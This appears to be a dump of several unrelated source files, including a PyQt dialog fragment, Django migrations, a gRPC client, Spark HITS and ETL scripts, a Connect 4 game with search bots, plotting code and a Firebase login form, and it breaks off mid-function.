item.setText(_translate("Dialog", "合計"))
item = self.tableWidget_2.horizontalHeaderItem(0)
item.setText(_translate("Dialog", "金額"))
__sortingEnabled = self.tableWidget_2.isSortingEnabled()
self.tableWidget_2.setSortingEnabled(False)
item = self.tableWidget_2.item(0, 0)
item.setText(_translate("Dialog", "0"))
item = self.tableWidget_2.item(1, 0)
item.setText(_translate("Dialog", "0"))
self.tableWidget_2.setSortingEnabled(__sortingEnabled)
self.textBrowser.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'.SF NS Text\'; font-size:13pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">ここに案内が表示される</p></body></html>"))
self.pushButton_3.setText(_translate("Dialog", "選択肢A"))
self.pushButton_3.setShortcut(_translate("Dialog", "Y"))
self.pushButton_4.setText(_translate("Dialog", "選択肢B"))
self.pushButton_4.setShortcut(_translate("Dialog", "N"))
self.label_setPix.setText(_translate("Dialog", "TextLabel"))
|
995,028 | d8dd5ceefe19fe851259a312ad0cb7c791e93060 | import sys
import colors
class ColorPrint(object):
def __init__(self):
self.colors = colors
def __getattr__(self, name):
if not name.startswith('print'):
raise NameError('%s has no method %s' % (
self.__module__, name))
color = name.split('_', 1)[-1]
return self._get_print_color_method(color)
def _get_color_str(self, color):
try:
return getattr(self.colors, color.upper())
except AttributeError:
return ''
def _get_print_color_method(self, color):
def print_(val):
print '{color}{val}{stop}'.format(
color=self._get_color_str(color),
val=val,
stop=self.colors.COLOR_OFF,
)
return print_
sys.modules[__name__] = ColorPrint()
|
995,029 | 8e57c3348758f09b34258981e409738edea66bc6 | # Generated by Django 3.0 on 2020-01-08 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('appsblog', '0003_appsblog_features'),
]
operations = [
migrations.AddField(
model_name='appsblog',
name='install_steps',
field=models.TextField(blank=True),
),
]
|
995,030 | e590d09a2a220d4f169f5f400457c39c88cd1e26 | import os
os.system("make depend")
os.system("make")
os.system("make install")
|
995,031 | 0774597344afab28a45457aebff87f21aa246f5f | import grpc
import unary.unary_pb2_grpc as pb2_grpc
import unary.unary_pb2 as pb2
class UnaryClient(object):
"""
Client for accessing the gRPC functionality
"""
def __init__(self):
# configure the host and the
# the port to which the client should connect
# to.
self.host = 'localhost'
self.server_port = 50051
# instantiate a communication channel
self.channel = grpc.insecure_channel(
'{}:{}'.format(self.host, self.server_port))
# bind the client to the server channel
self.stub = pb2_grpc.UnaryStub(self.channel)
def get_url(self, message):
"""
Client function to call the rpc for GetServerResponse
"""
message = pb2.Message(message=message)
print(f'{message}')
return self.stub.GetServerResponse(message)
if __name__ == '__main__':
client = UnaryClient()
result = client.get_url(message="Hello Server you there?")
print(f'{result}')
|
995,032 | ef482e2256ce60f1c5b091f6a525b6dacf8a6ff1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('exams', '0037_auto_20150208_2337'),
]
operations = [
migrations.AlterField(
model_name='participantresult',
name='correct',
field=models.PositiveIntegerField(verbose_name='\u067e\u0627\u0633\u062e \u0647\u0627\u06cc \u0635\u062d\u06cc\u062d'),
preserve_default=True,
),
migrations.AlterField(
model_name='participantresult',
name='score',
field=models.PositiveIntegerField(verbose_name='Score'),
preserve_default=True,
),
migrations.AlterField(
model_name='participantresult',
name='user',
field=models.ForeignKey(verbose_name='\u0634\u0631\u06a9\u062a \u06a9\u0646\u0646\u062f\u0647', to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
migrations.AlterField(
model_name='participantresult',
name='wrong',
field=models.PositiveIntegerField(verbose_name='\u067e\u0627\u0633\u062e \u0647\u0627\u06cc \u063a\u0644\u0637'),
preserve_default=True,
),
migrations.AlterField(
model_name='question',
name='correct_score',
field=models.PositiveSmallIntegerField(default=4, help_text='\u0645\u06cc\u0632\u0627\u0646 \u0646\u0645\u0631\u0647 \u0627\u06cc \u06a9\u0647 \u0628\u0647 \u0627\u0632\u0627\u06cc \u067e\u0627\u0633\u062e \u062f\u0631\u0633\u062a \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc \u0634\u0648\u062f', verbose_name='\u0627\u0645\u062a\u06cc\u0627\u0632 \u067e\u0627\u0633\u062e \u0635\u062d\u06cc\u062d'),
preserve_default=True,
),
migrations.AlterField(
model_name='question',
name='wrong_penalty',
field=models.PositiveSmallIntegerField(default=1, help_text='\u0645\u06cc\u0632\u0627\u0646 \u0646\u0645\u0631\u0647 \u0627\u06cc \u06a9\u0647 \u0628\u0647 \u0627\u0632\u0627\u06cc \u067e\u0627\u0633\u062e \u063a\u0644\u0637 \u06a9\u0645 \u0645\u06cc \u0634\u0648\u062f', verbose_name='\u062c\u0631\u06cc\u0645\u0647 \u06cc \u067e\u0627\u0633\u062e \u063a\u0644\u0637'),
preserve_default=True,
),
]
|
995,033 | 02162dcfbd5390a40a7a4517621b3e8d53c62a3d |
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
from collections import defaultdict
import numpy as np
from zutils import *
from zcostfunc import *
from zirie import IRIE
mpl.rcParams['font.family'] = 'serif'
plt.rcParams['font.size'] = 16
plt.rcParams['axes.linewidth'] = 1
import logging
def draw_sigma(network):
csv = pd.read_csv('./Test/{}.csv'.format(network), index_col=0, header=0)
algs = csv.index.tolist()
# ['CELF++', 'MaxDegree', 'TIM', 'StaticGreedy', 'ICT']
draw_config = {
'CELF++': ['#1B9D77', 'p'],
'MaxDegree': ['#A6CFE3', 's'],
'TIM': ['#EF8860', 'v'],
'StaticGreedy': ['#A2A2A2', '^'],
'ICT': ['#386BB0', 'o']
}
plt.figure(figsize=(10,7))
plt.grid(linestyle="--") # 设置背景网格线为虚线
ax = plt.gca()
ax.xaxis.set_tick_params(which='major', size=10, width=2, direction='in', top='on')
ax.xaxis.set_tick_params(which='minor', size=7, width=2, direction='in', top='on')
ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
x = [0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 48]
for alg in draw_config.keys():
if alg not in algs:
continue
data = csv.loc[alg].tolist()
arr = x[:]
if len(data) == 10:
arr.pop(0)
else:
data = [data[i] for i in x]
arr[0] = 1
plt.plot(arr, data, label=alg, color=draw_config[alg][0], marker=draw_config[alg][1], linewidth=2.5, markersize=10)
plt.yticks(size=18)
plt.xticks(size=18)
ax.set_ylabel('Spread of influence', labelpad=5, size=20)
ax.set_xlabel('Number of seeds(k)', labelpad=10, size=20)
plt.legend(fontsize=18)
plt.savefig('D:\latexProject\CSCWD\DrawMax\sigma-{}.pdf'.format(network), dpi=300, transparent=False, bbox_inches='tight')
def draw_runtime():
file = open('./Test/runtime.csv', 'r')
datasets = ['NetHEPT', 'NetPHY', 'Sina Weibo']
record = defaultdict(list)
bar_width = 3
draw_config = {
'MaxDegree': ['#9ABBF3', '/'],
'StaticGreedy': ['#FFFFA2', 'x'],
'CELF++': ['#C2B2D6', '-'],
'TIM': ['#9BD59B', "\\"],
'ICT': ['#FDC897', None]
}
for line in file.readlines():
arr = line.strip().split(',')
alg, val = arr[0], float(arr[1])
record[alg].append(val)
for alg in record.keys():
while len(record[alg]) < len(datasets):
record[alg].append(10**-9)
x = np.array([i * 15 + i * 10 for i in range(3)])
idx = 0
plt.figure(figsize=(22,14))
plt.grid(linestyle="--") # 设置背景网格线为虚线
ax = plt.gca()
# ax.xaxis.set_tick_params(which='major', size=10, width=2, direction='in', top='on')
# ax.xaxis.set_tick_params(which='minor', size=7, width=2, direction='in', top='on')
ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
# 显示高度
def autolabel(rects, labels):
for rect, label in zip(rects, labels):
height = rect.get_height()
if height == 0:
continue
plt.text(rect.get_x() - 0.3, 0.1 + height, label, fontsize=20, zorder=11)
for alg in record.keys():
data = np.array(record[alg])
height_label = []
for d in data:
cnt = 0
while d >= 60:
d /= 60
cnt += 1
unit = 's'
if cnt == 1:
unit = 'm'
elif cnt == 2:
unit = 'h'
if d < 0.01:
label = str(round(d, 3)) + unit
elif d < 10:
label = str(round(d, 2)) + unit
else:
label = str(round(d, 1)) + unit
height_label.append(label)
data = np.log10(data) + 3
data = np.clip(data, 0, 10)
autolabel(plt.bar(x + idx * bar_width, data, bar_width, label=alg, color=draw_config[alg][0], hatch=draw_config[alg][1],edgecolor='#000000', zorder=10), height_label)
idx += 1
y = np.array([i for i in range(-3, 7, 2)])
ytick = [r'$10^{'+ str(i) +'}$' for i in y]
plt.xticks(x + bar_width * 5 / 2, datasets, size=28)
plt.yticks(y + 3, ytick, size=28)
plt.ylabel('Running time(s)', labelpad=5, size=32)
plt.xlabel('Datasets', labelpad=10, size=32)
# plt.legend(ncol=2, loc=2, fontsize=28, shadow=False, fancybox=False)
plt.legend(fontsize=28)
# plt.show()
plt.savefig('D:\latexProject\CSCWD\DrawMax\Runtime.pdf', dpi=300, transparent=False, bbox_inches='tight')
def draw_simulate_predict():
k = 1
mc = 1000
network_type = "NetHEPTFix"
# 加载原生图
g = ZGraph()
sp_a = load_network(g, network_type)
func = sigmod_func
IRIE(k, g, sp_a, func, True)
def draw_cost(network):
import os
name = network
if name == 'EpinionsFix':
name = "NetPHYFix"
if not os.path.exists('./Test/Cost-{}.csv'.format(name)):
print(name, "COST 记录不存在")
return
file = open('./Test/Cost-{}.csv'.format(name), 'r')
record = {}
xlenth = 0
for line in file.readlines():
arr = line.split(',')
alg = arr.pop(0)
sigmas = list(map(lambda x: float(x), arr))
xlenth = len(sigmas)
record[alg] = sigmas
bar_width = 3
x = np.array([i * bar_width * 6 for i in range(xlenth)])
draw_config = {
'MaxDegree': ['#9ABBF3', '/'],
'StaticGreedy': ['#FFFFA2', 'x'],
'CELF++': ['#C2B2D6', '.'],
'TIM': ['#9BD59B', "\\"],
'ICT': ['#FDC897', None]
}
plt.figure(figsize=(22,14))
plt.grid(linestyle="--") # 设置背景网格线为虚线
ax = plt.gca()
ax.yaxis.set_tick_params(which='major', size=10, width=2, direction='in', right='on')
ax.yaxis.set_tick_params(which='minor', size=7, width=2, direction='in', right='on')
idx = 0
for alg in draw_config.keys():
if alg not in record:
continue
plt.bar(x + idx * bar_width, record[alg], bar_width, label=alg, zorder=10, color=draw_config[alg][0], hatch=draw_config[alg][1], edgecolor='#000000')
idx += 1
plt.yticks(size=40)
plt.xticks(x + bar_width * 5 / 2.5, budgets_config[network], size=40)
ax.set_ylabel('Spread of influence', labelpad=5, size=48)
ax.set_xlabel('Budget', labelpad=10, size=48)
plt.legend(fontsize=40)
plt.savefig('D:\latexProject\CSCWD\DrawMax\Cost-{}.pdf'.format(network), dpi=300, transparent=False, bbox_inches='tight')
if __name__ == "__main__":
draw_runtime()
# draw_simulate_predict()
networks = ['NetHEPTFix', 'NetPHYFix', 'EpinionsFix']
for network in networks:
draw_sigma(network)
draw_cost(network) |
995,034 | c04edea687245f60bfcb8253ec3111455561f95d | import os
import sys
import time
import csv
import numpy as np
def time_to_slot(hh,mm):
""" Split the time steps within one day into 96 different slots.
Parameters
----------
hh : hour
mm : minute
Notes
-----
The time taken for a slot is 15' step
"""
hour_slot = hh*4
minute_slot = 0
if mm <= 14:
minute_slot = 1
elif mm <= 29 and mm >=15:
minute_slot = 2
elif mm <= 44 and mm >=30:
minute_slot = 3
elif mm >= 45 and mm <=60:
minute_slot = 4
else:
print("Minute value incorrect, please check it")
timeslot = hour_slot + minute_slot
return timeslot
if __name__ == '__main__':
times = time_to_slot( 2, 15)
print(times)
|
995,035 | 0f0f06cb67cee46492b4835b11d95042e5eae240 | # -*- coding: utf-8 -*-
# @Author: Arius
# @Email: arius@qq.com
# @Date: 2019-01-26 23:55:45
|
995,036 | 1761a8e3c92f7f60101c23f61b6d4a42ffaf1ca1 | def harmonicNum(n):
if n == 1:
return 1
else:
return harmonicNum(n-1) + 1/(n-1)
if __name__ == "__main__":
print(harmonicNum(4))
|
995,037 | 0308766a64e1e5d8e9ad1f79306ab25583b31433 | import torch
from torch.utils.data import Dataset, DataLoader
from model import *
from data_loaders import *
from get_embeddings import *
from constants import *
def main():
print("[INFO] -> Loading Preprocessed Data ...")
model_data_german = torch.load("../data/data_de_"+DOMAIN+".pt")
print("[INFO] -> Done.")
# print("[INFO] -> Loading Vocabulary ...")
# de_vocab = get_vocab(model_data_german.train_data+model_data_german.test_data)
# print("[INFO] -> Done.")
# print("[INFO] -> Loading MUSE Embeddings ...")
# embeddings_model = Emb_Model()
# embeddings_model.get_MUSE_embeddings(de_vocab)
# print("The length of the embedding dictionary %d", len(embeddings_model.embeddings))
# print("The length of the word2index dictionary %d", len(embeddings_model.word2index))
# print("The length of the index2word dictionary %d", len(embeddings_model.index2word))
# print("[INFO] -> Done.")
trained_dict = torch.load(MODEL_PREFIX+MODEL_FILE)
print(trained_dict["acc"])
print(trained_dict["run_ID"])
exit(0)
# config = trained_dict[""]
# valid_dset = Driver_Data(
# data = model_data_german.test_data,
# targets = model_data_german.test_targets,
# word2index = embeddings_model.word2index,
# lang_identifier = [LANG_DICT["ger"] for i in range(len(model_data_german.test_data))])
# valid_loader = DataLoader(valid_dset, batch_size = config.BATCH_SIZE, shuffle = False, num_workers = 10,collate_fn=pack_collate_fn)
# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# print("[INFO] -> Using Device : ",device)
# model = LSTM_sent_disc(embeddings=embeddings_model.embeddings,config=config).to(device)
# print(trained_model["acc"])
if __name__=="__main__":
main() |
995,038 | 8dc6728a707a00ad65f689ae31bf57d382ee019a | ## Code for HITS.py
## Calculates the hubbiness and authority of all nodes (uses 40 iterations)
import sys
import numpy as np
from pyspark import SparkConf, SparkContext
from pyspark.accumulators import AccumulatorParam
conf = SparkConf()
sc = SparkContext(conf=conf)
lines = sc.textFile(sys.argv[1])
data = lines.map(lambda line: line.split())
edgeList = data.map(lambda l: (int(l[0]),int(l[1])))
edgeList = edgeList.distinct()
n = edgeList.map(lambda k: k[0]).distinct().count()
h = np.ones(n)
a = np.zeros(n)
def update_a(edge, h, a_accum):
update = np.zeros(len(h))
update[edge[1]-1] = h[edge[0]-1]
a_accum.add(update)
def update_h(edge, a, h_accum):
update = np.zeros(len(h))
update[edge[0]-1] = a[edge[1]-1]
h_accum.add(update)
class VectorAccumulatorParam(AccumulatorParam):
def zero(self, value):
return np.zeros(len(value))
def addInPlace(self, v1, v2):
v1 += v2
return v1
for i in range(40):
a_accum = sc.accumulator(a, VectorAccumulatorParam())
edgeList.foreach(lambda edge: update_a(edge, h, a_accum))
a = a_accum.value
a = a / np.amax(a)
h_accum = sc.accumulator(h, VectorAccumulatorParam())
edgeList.foreach(lambda edge: update_h(edge, a, h_accum))
h = h_accum.value
h = h / np.amax(h)
asort = np.argsort(a)
# print(list(a))
print("a Worst: ", asort[:5]+1)
print("a Best: ", asort[990:]+1)
hsort = np.argsort(h)
# print(list(h))
print("h Worst: ", hsort[:5]+1)
print("h Best: ", hsort[990:]+1) |
995,039 | 9a1ce1f7afad23aed2fa2bb0eb7c5ea8cbcf283e | numero = [0]*2
for i in range(2):
numero[i] = int(input('Digite o {}º número: '.format(i+1)))
if numero[0] > numero[1]:
print('O primeiro valor é maior!')
elif numero[0] < numero[1]:
print('O segundo valor é maior!')
elif numero[0] == numero[1]:
print('Os dois valores são iguais!')
|
995,040 | f9a36ab12d1fde95a2e77899a80e9f23aad21b0c |
### import
from quizzer.models.model import Model, MAX_LEN
from quizzer.models.teacher import Teacher
### Class
class Class(Model):
FIELDS = dict(
number=dict(types=unicode, length=(1, MAX_LEN)),
name=dict(types=unicode, length=(1, MAX_LEN)),
teacher=dict(types=Teacher, null=True, default=None),
)
### find_students
def find_students(self):
"""
Find students attending this class in the current semester.
@yield student: Student
"""
from quizzer.models.attendance import Attendance
from quizzer.models.semester import Semester
semester = Semester.get_current()
for attendance in Attendance.objects: # TODO: Use indexed query later.
if attendance.semester == semester and attendance.class_ == self:
yield attendance.student
|
995,041 | 1831a6f36be5a572f650402982d26e9706e01635 | ## function to find area of rectangle
def area_rectangle(l, b):
return l*b
|
995,042 | f224c5526d3d2ffeb7d8eea87f2cd6febb0bcd2a | import numpy as np
import os
import math
import pygame
from time import sleep
from Robots import Robots
from GamePlay import GamePlay
#class that creates the connect4 environment
class Connect4():
def __init__(self,p1='HUMAN',p2='HUMAN',depth=3,spacing=100,controler=0):
self.gameplay=GamePlay()
self.bots = Robots()
self.p1=p1
self.p2=p2
self.depth = depth
self.bots.depth = self.depth
self.ROWS = self.gameplay.ROWS
self.COLUMNS = self.gameplay.COLUMNS
self.CONNECT = self.gameplay.CONNECT
self.BOARD = self.gameplay.BOARD
self.prev = self.gameplay.prev
#pygame shit
self.spacing = spacing
self.controler = controler
self.windowx=self.COLUMNS*self.spacing+self.controler
self.windowy=(self.ROWS+1)*spacing
#colors for the board!
self.BG_COLOR = (28, 170, 156)
self.BLUE = (0,0,225)
self.RED = (255, 0 ,50)
self.YELLOW = (255,200,0)
self.BLACK = (0, 0, 0)
self.coffee_brown =((200,190,140))
#dictionary to assign circle colors
self.color_dict={0:self.BLACK,1: self.RED,2: self.YELLOW}
def load_model(self,name=None):
if name==None:
self.bots.load_model()
else:
self.bots.load_model(name)
def Set_Depth(self,depth):
self.depth = depth
self.bots.depth = depth
#display board!
def Display_BOARD(self,turn,BOARD):
os.system('cls')
print('Play Connect 4!')
print('Player 1 Score: {}. Player 2 Score: {}'.format(self.gameplay.Get_Score(1,BOARD),self.gameplay.Get_Score(2,BOARD)))
print("Player {}'s turn!".format((turn % 2)+1))
print('Legal Moves:')
print(self.gameplay.Get_Legal_Moves(BOARD))
print('')
for row in BOARD:
print(row)
#Function to play the game in CMD
def play(self):
turn = 0
status=self.gameplay.Check_Goal(self.gameplay.BOARD)
self.Display_BOARD(turn,self.gameplay.BOARD)
while status == 'Keep Playing!':
actions = self.gameplay.Get_Legal_Moves(self.gameplay.BOARD)
print('')
if turn % 2 ==0:
if self.p1 !='HUMAN': #if it's not a human do the robot moves
m = self.bots.ROBOT(1,self.p1,self.gameplay.BOARD)
else:
m = input('Where would you like to go? ')
try:
self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
turn +=1
except:
print('Invalid Move')
elif turn % 2 ==1:
if self.p2 !='HUMAN':
m = self.bots.ROBOT(2,self.p2,self.gameplay.BOARD)
else:
m = input('Where would you like to go? ')
try:
self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
turn +=1
except:
print('Invalid Move')
self.Display_BOARD(turn,self.gameplay.BOARD)
status=self.gameplay.Check_Goal(self.gameplay.BOARD)
print(status)
#helper functions
def Draw_Section(self,x,y,width,item):
pygame.draw.rect(self.window,self.BLUE, [x,y,width,width])
pygame.draw.circle(self.window, self.color_dict[item], (math.floor(x+width/2),
math.floor(y+width/2)), math.floor(width/2)-3)
def Draw_Board(self):
for j,row in enumerate(self.gameplay.BOARD):
for i,cell in enumerate(row):
self.Draw_Section(self.spacing*i,self.spacing+self.spacing*j,self.spacing,cell)
def Get_Col(self,x):
floor=0
ceiling = self.spacing
for i in range(self.COLUMNS):
if floor<x<ceiling:
return i
floor = floor + self.spacing
ceiling = ceiling + self.spacing
#play with pygame
def play_Graphics(self):
self.window = pygame.display.set_mode((self.windowx,self.windowy))
pygame.init()
pygame.display.set_caption('Connect 4')
self.window.fill(self.BG_COLOR)
run = True
turn = 0
while run:
status=self.gameplay.Check_Goal(self.gameplay.BOARD)
actions = self.gameplay.Get_Legal_Moves(self.gameplay.BOARD)
if turn % 2 ==0 and self.p1!='HUMAN' and status=='Keep Playing!':
m = self.bots.ROBOT(1,self.p1,self.gameplay.BOARD)
self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
status=self.gameplay.Check_Goal(self.gameplay.BOARD)
turn +=1
if turn % 2 ==1 and self.p2!='HUMAN' and status=='Keep Playing!':
m = self.bots.ROBOT(2,self.p2,self.gameplay.BOARD)
self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
turn +=1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
mx, my = event.pos
if turn % 2 ==0 and self.p1 =='HUMAN':
m = self.Get_Col(mx)
try:
self.gameplay.Add_Piece(1,int(m),self.gameplay.BOARD)
except:
print('Invalid Move')
if turn % 2 ==1 and self.p2=='HUMAN':
m = self.Get_Col(mx)
try:
self.gameplay.Add_Piece(2,int(m),self.gameplay.BOARD)
except:
print('Invalid Move')
turn +=1
print('Player 1 Score: {}. Player 2 Score: {}'.format(self.gameplay.Get_Score(1,self.gameplay.BOARD),self.gameplay.Get_Score(2,self.gameplay.BOARD)))
#self.gameplay.Display_BOARD(turn)
status=self.gameplay.Check_Goal(self.gameplay.BOARD)
self.Draw_Board()
pygame.display.update()
if status !='Keep Playing!':
print(status)
sleep(3)
run = False
#FmoveBot, Rando, MiniMax, AlphaBeta
if __name__=="__main__":
game=Connect4()
game.Set_Depth(4)
game.p2='AlphaBeta'
#game.p2='MiniMax'
#game.load_model('mymodel_5000.h5')#'mymodel_30794.h5')
#game.p1='DNN'
#game.p2='Rando'
#game.play()
game.play_Graphics()
|
995,043 | 1104efbfcaa0cdb8fe4492fe85f96bcb6e444801 | from django import forms
from firesdk.firebase_functions.firebaseconn import CompanyId, encode_email, get_user
from firebase_admin import auth
class LoginForm(forms.Form):
company_id = forms.CharField(max_length=50, required=True)
email = forms.EmailField(max_length=254, required=True)
password = forms.CharField(widget=forms.PasswordInput(), required=True)
token = forms.CharField(widget=forms.HiddenInput())
remember_code = forms.BooleanField(required=False)
def clean(self):
cleaned_data = super().clean()
company_id = cleaned_data.get('company_id')
email = cleaned_data.get('email')
token = cleaned_data.get('token')
# check if company code is real.
try:
company_name = CompanyId.objects.get(company_code=company_id).name
except CompanyId.DoesNotExist:
raise forms.ValidationError('Invalid Credentials')
# check if user exists in company
user = get_user(company_name, encode_email(email))
if not user:
raise forms.ValidationError('Invalid Credentials')
# validate token
try:
_ = auth.verify_id_token(token)
except ValueError:
raise forms.ValidationError('Invalid Credentials')
return self.cleaned_data
|
995,044 | b8d3a49312644059b6e688c627163c1fe6c8b1be | #!/usr/bin/env python
# coding: utf-8
# load_dims.py
# Author: Kevin Solano
from modulos.create_sparkSession import create_spark_session
from pyspark.sql.functions import *
from pyspark.sql import types as t
import configparser
def load_dim_job():
"""
proceso de carga de dim_job
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
#DIM JOB POST
# transformando la dimensión
df_dim = df_stg_jobposts.select("job_title", "job_category1").distinct() \
.withColumn("job_key", expr("uuid()")) \
.withColumnRenamed("job_category1", "job_category") \
.withColumn("created_date", current_date()) \
.select("job_key", "job_title", "job_category", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job")
# transformando la dimensión
df_dim = df_stg_jobposts.select("job_title", "job_category1").distinct() \
.withColumnRenamed("job_category1", "job_category") \
.withColumn("created_date", current_date()) \
.select("job_title", "job_category", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, [df_dim["job_title"] == df_act_dim["job_title"],
df_dim["job_category"] == df_act_dim["job_category"]],"leftanti") \
.withColumn("job_key", expr("uuid()")) \
.select("job_key", "job_title", "job_category", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job", mode="overwrite")
def load_dim_city():
"""
carga de dimensión de ciudad
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
#DIM CITY
# transformando la dimensión
df_dim = df_stg_jobposts.select("city").distinct() \
.withColumn("city_key", expr("uuid()")) \
.withColumn("country", lit("EGIPTO")) \
.withColumn("created_date", current_date()) \
.select("city_key", "city", "country","created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_city", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_city")
# transformando la dimensión
df_dim = df_stg_jobposts.select("city").distinct() \
.withColumn("country", lit("EGIPTO")) \
.withColumn("created_date", current_date()) \
.select("city", "country", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["city"] == df_act_dim["city"],"leftanti") \
.withColumn("city_key", expr("uuid()")) \
.select("city_key", "city", "country", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_city", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_city") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_city", mode="overwrite")
def load_dim_industry():
"""
proceso de carga de dim_industry
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
# transformando la dimensión
df_dim = df_stg_jobposts.select("job_industry1").distinct() \
.withColumn("industry_key", expr("uuid()")) \
.withColumnRenamed("job_industry1", "job_industry") \
.withColumn("created_date", current_date()) \
.select("industry_key", "job_industry", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_industry", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_industry")
# transformando la dimensión
df_dim = df_stg_jobposts.select("job_industry1").distinct() \
.withColumnRenamed("job_industry1", "job_industry") \
.withColumn("created_date", current_date()) \
.select("job_industry", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["job_industry"] == df_act_dim["job_industry"],"leftanti") \
.withColumn("industry_key", expr("uuid()")) \
.select("industry_key", "job_industry", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_industry", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_industry") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_industry", mode="overwrite")
def load_dim_career_level():
"""
proceso de dim_career_level
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
# transformando la dimensión
df_dim = df_stg_jobposts.select("career_level").distinct() \
.withColumn("career_level_key", expr("uuid()")) \
.withColumn("created_date", current_date()) \
.select("career_level_key", "career_level", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_career_level", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_career_level")
# transformando la dimensión
df_dim = df_stg_jobposts.select("career_level").distinct() \
.withColumn("created_date", current_date()) \
.select("career_level", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["career_level"] == df_act_dim["career_level"],"leftanti") \
.withColumn("career_level_key", expr("uuid()")) \
.select("career_level_key", "career_level", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_career_level", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_career_level") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_career_level", mode="overwrite")
def load_dim_job_requirements():
"""
proceso de dim_job_requirements
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
#dim_job_requirements
# transformando la dimensión
df_dim = df_stg_jobposts.select("id", "job_requirements").distinct() \
.withColumn("job_requirements_key", expr("uuid()")) \
